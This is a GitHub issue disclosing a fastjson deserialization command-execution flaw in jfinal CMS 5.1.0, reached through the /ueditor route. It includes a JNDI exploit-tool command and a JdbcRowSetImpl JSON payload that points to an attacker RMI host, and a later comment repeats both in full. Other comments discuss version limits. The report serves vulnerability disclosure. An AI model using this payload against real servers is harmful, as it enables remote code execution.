Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

jfinal CMS v5.1.0 has a command execution vulnerability exists #54

Open
baimao-box opened this issue Feb 10, 2023 · 5 comments
Open

jfinal CMS v5.1.0 has a command execution vulnerability exists #54

baimao-box opened this issue Feb 10, 2023 · 5 comments

Comments

@baimao-box
Copy link

jfinal_cms version:5.1.0
JDK version : jdk-8u351

The ActionEnter class is instantiated in the index method of the /ueditor route

image

The ConfigManager class is instantiated in the constructor of the ActionEnter class

image

The construction method of ConfigManager calls initEnv()

image

Call JSONObject.parseObject to parse the file content, and the file content here is controllable, just replace the file content with the payload.

image

The file comes from WEB-INF/classes/config.json. With any file upload vulnerability in the background, this file can be replaced with a file containing the payload to trigger fastjson deserialization

image

Run the tool on kali

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc.exe"

image

payload:

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.0.110:1099/d0inxc",
        "autoCommit":true
    }
}

image

Replace with payload

Visit /ueditor, execute the command to pop up the calculator

136699966-b0b2294c-cdf1-4145-9340-cc0885a7e73d
@ElevenKong
Copy link

ElevenKong commented Feb 10, 2023 via email

@tianxiabingmadadudu
Copy link

jfinal_cms version:5.1.0 JDK version : jdk-8u351

The ActionEnter class is instantiated in the index method of the /ueditor route

image

The ConfigManager class is instantiated in the constructor of the ActionEnter class

image

The construction method of ConfigManager calls initEnv()

image

Call JSONObject.parseObject to parse the file content, and the file content here is controllable, just replace the file content with the payload.

image

The file comes from WEB-INF/classes/config.json. With any file upload vulnerability in the background, this file can be replaced with a file containing the payload to trigger fastjson deserialization

image

Run the tool on kali

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc.exe"

image

payload:

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.0.110:1099/d0inxc",
        "autoCommit":true
    }
}

image

Replace with payload

Visit /ueditor, execute the command to pop up the calculator

136699966-b0b2294c-cdf1-4145-9340-cc0885a7e73d 136699966-b0b2294c-cdf1-4145-9340-cc0885a7e73d

image 1.2.62这个版本下反序列化不是修复了吗。大佬是怎么实现的。我这报错了。com.alibaba.fastjson.JSONException: autoType is not support. com.sun.rowset.JdbcRowSetImpl

@ElevenKong
Copy link

ElevenKong commented Jun 25, 2023 via email

@By-Yexing
Copy link

This version of fastjson does have the risk of deserialization, but the poc given by the author is clearly 1.2.25-1.2.47 of the chain, according to the impression, if you want to use this version, you need to introduce an additional jar package, is I not fine??

@ElevenKong
Copy link

ElevenKong commented Jan 7, 2024 via email

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
4 participants
@ElevenKong @tianxiabingmadadudu @baimao-box @By-Yexing